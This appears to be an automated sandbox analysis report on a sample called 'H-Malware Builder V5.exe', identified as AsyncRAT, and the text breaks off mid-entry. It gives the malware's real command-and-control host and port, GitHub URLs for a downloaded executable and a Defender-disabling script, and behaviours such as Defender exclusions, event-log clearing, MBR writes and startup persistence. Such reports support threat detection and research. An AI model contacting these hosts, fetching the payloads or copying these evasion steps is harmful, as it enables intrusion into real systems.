Analysis
-
max time kernel
121s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03/12/2024, 09:46
Static task
static1
Behavioral task
behavioral1
Sample
H-Malware Builder V5.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
H-Malware Builder V5.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral3
Sample
H-Malware Builder V5.exe
Resource
win11-20241007-en
General
-
Target
H-Malware Builder V5.exe
-
Size
407KB
-
MD5
c8f6d76b4ae82978272bde392561c4f4
-
SHA1
80447d36fcf88cc9caa806db53e22d9468cc31ee
-
SHA256
c981ebcf0c0cf857162ae35b9385c22d3198c2ec9ea00e37fcfe74a79eb3510e
-
SHA512
10fa87f050a9ceb658e443317158ef8b1dbaa9e183ec61b5e5e42adb562f7918d996134aba7f0bbad852def4d6b0824c7b9716628b554194d0fd95974de6b2ad
-
SSDEEP
12288:r5p4UNBN3aqeKNoRfwoZrHMBV9EwEcb8+DvtuWUb:r9N3aqPCRooZwBjEhcYcvYWUb
Malware Config
Extracted
https://github.com/MalwareTeam/SecurityHealthService/raw/main/SecurityHealthService.exe
https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat
Extracted
asyncrat
1.0.7
Default
bay-helps.gl.at.ply.gg:36538
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2500 created 616 2500 Stub.exe 5 -
Async RAT payload 2 IoCs
resource yara_rule behavioral1/files/0x0033000000023b75-23.dat family_asyncrat behavioral1/memory/2500-39-0x000001D9F0FF0000-0x000001D9F1002000-memory.dmp family_asyncrat -
Blocklisted process makes network request 3 IoCs
flow pid Process 14 3676 powershell.exe 15 3676 powershell.exe 20 3940 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 50 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2040 powershell.exe 1128 powershell.exe 1424 powershell.exe 4448 powershell.exe 1048 powershell.exe 4932 powershell.exe 2332 powershell.exe 5076 powershell.exe 2956 powershell.exe 3588 powershell.exe 2004 powershell.exe 1820 powershell.exe 1964 powershell.exe 1488 powershell.exe 4520 powershell.exe 3520 powershell.exe 3724 powershell.exe 4420 powershell.exe 2836 powershell.exe 516 powershell.exe 2164 powershell.exe 3212 powershell.exe 1764 powershell.exe 468 powershell.exe 5104 powershell.exe 316 powershell.exe 700 powershell.exe 1380 powershell.exe 2916 powershell.exe 2656 powershell.exe 1196 powershell.exe 4368 powershell.exe 1524 powershell.exe 3772 powershell.exe 456 powershell.exe 3200 powershell.exe 4512 powershell.exe 1992 powershell.exe 4104 powershell.exe 2320 powershell.exe 612 powershell.exe 2684 powershell.exe 2264 powershell.exe 1180 powershell.exe 3252 powershell.exe 4540 powershell.exe 212 powershell.exe 4848 powershell.exe 4036 powershell.exe 4232 powershell.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DoSvc\ImagePath = "C:\\Windows\\System32\\svchost.exe -k NetworkService -p" WaaSMedicAgent.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Checks computer location settings 2 TTPs 43 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation Stub.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation H-Malware Builder V5.exe -
Drops startup file 40 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Stub.exe H-Malware Builder V5.exe -
Executes dropped EXE 1 IoCs
pid Process 2500 Stub.exe -
Indicator Removal: Clear Windows Event Logs 1 TTPs 4 IoCs
Clear Windows Event Logs to hide the activity of an intrusion.
description ioc Process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-RestartManager%4Operational.evtx svchost.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\O: svchost.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\Q: svchost.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PHYSICALDRIVE0 wmiprvse.exe -
Drops file in System32 directory 16 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D lsass.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\kpkopw.exe Explorer.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2500 set thread context of 3784 2500 Stub.exe 87 -
Drops file in Windows directory 6 IoCs
description ioc Process File opened for modification C:\Windows\WindowsUpdate.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.log svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.edb svchost.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\DataStore.jfm svchost.exe File opened for modification C:\Windows\SoftwareDistribution\ReportingEvents.log svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 21 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Toolbar Explorer.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" Explorer.EXE -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02oqduuijzvltxfy svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02hffkmccggumxty svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\02zffscyanttqogt svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-3350944739-639801879-157714471-1000\ValidDeviceId = "02zffscyanttqogt" svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={A12D8F7C-D7F5-483B-B90C-BCC15D5FB2ED}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00184011ADE07956" svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 